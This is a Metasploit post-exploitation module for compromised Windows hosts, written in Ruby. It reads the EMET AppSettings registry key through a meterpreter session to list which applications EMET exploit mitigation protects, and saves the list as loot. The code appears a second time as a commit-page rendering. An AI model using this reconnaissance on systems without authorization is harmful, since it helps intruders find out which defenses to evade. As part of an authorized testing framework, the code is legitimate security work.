metasploit-framework/modules/post/windows/gather/enum_emet.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rex'
require 'msf/core/post/common'

class MetasploitModule < Msf::Post

  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Registry
  include Msf::Post::Common

  def initialize(info={})
    super( update_info( info,
        'Name'          => 'Windows Gather EMET Protected Paths',
        'Description'   => %q{ This module will enumerate the EMET protected paths on the target host.},
        'License'       => MSF_LICENSE,
        'Author'        => [ 'vysec <vincent.yiu[at]mwrinfosecurity.com>'],
        'Platform'      => [ 'win' ],
        'SessionTypes'  => [ 'meterpreter' ]
      ))

  end

  # Run Method for when run command is issued
  def run
    print_status("Running module against #{sysinfo['Computer']}")
    
    if sysinfo['Architecture'] =~ /x64/
        print_status("The underlying OS is 64 bit")
        if client.platform =~ /x86/
          print_error("You are in a 32 bit process, migrate to 64 bit and try again.")
        end
    end
    
    isadmin = is_admin?

    #a = registry_getvaldata('HKLM\HARDWARE\DESCRIPTION\System','SystemBiosVersion')
    reg_vals = registry_enumvals('HKLM\\SOFTWARE\\Microsoft\\EMET\\AppSettings')
    
    t = ""

    reg_vals.each do |x|
        t << "#{x}\r\n"
    end

    puts t

    p = store_loot("host.emet_paths", "text/plain", session, t, "emet_paths.txt", "EMET Paths")
    print_status("Results stored in: #{p}")
  end

end
enum_emet A module to enumerate all the EMET wildcard paths. 2016-04-21 23:20:25 +00:00			`##`
			`# This module requires Metasploit: http://metasploit.com/download`
			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

			`require 'msf/core'`
			`require 'rex'`
			`require 'msf/core/post/common'`

			`class MetasploitModule < Msf::Post`

			`include Msf::Post::Windows::Priv`
			`include Msf::Post::Windows::Registry`
			`include Msf::Post::Common`

			`def initialize(info={})`
			`super( update_info( info,`
			`'Name' => 'Windows Gather EMET Protected Paths',`
			`'Description' => %q{ This module will enumerate the EMET protected paths on the target host.},`
			`'License' => MSF_LICENSE,`
			`'Author' => [ 'vysec <vincent.yiu[at]mwrinfosecurity.com>'],`
			`'Platform' => [ 'win' ],`
			`'SessionTypes' => [ 'meterpreter' ]`
			`))`

			`end`

			`# Run Method for when run command is issued`
			`def run`
			`print_status("Running module against #{sysinfo['Computer']}")`

			`if sysinfo['Architecture'] =~ /x64/`
			`print_status("The underlying OS is 64 bit")`
			`if client.platform =~ /x86/`
			`print_error("You are in a 32 bit process, migrate to 64 bit and try again.")`
			`end`
			`end`

			`isadmin = is_admin?`

			`#a = registry_getvaldata('HKLM\HARDWARE\DESCRIPTION\System','SystemBiosVersion')`
			`reg_vals = registry_enumvals('HKLM\\SOFTWARE\\Microsoft\\EMET\\AppSettings')`

			`t = ""`

			`reg_vals.each do \|x\|`
			`t << "#{x}\r\n"`
			`end`

			`puts t`

			`p = store_loot("host.emet_paths", "text/plain", session, t, "emet_paths.txt", "EMET Paths")`
			`print_status("Results stored in: #{p}")`
			`end`

			`end`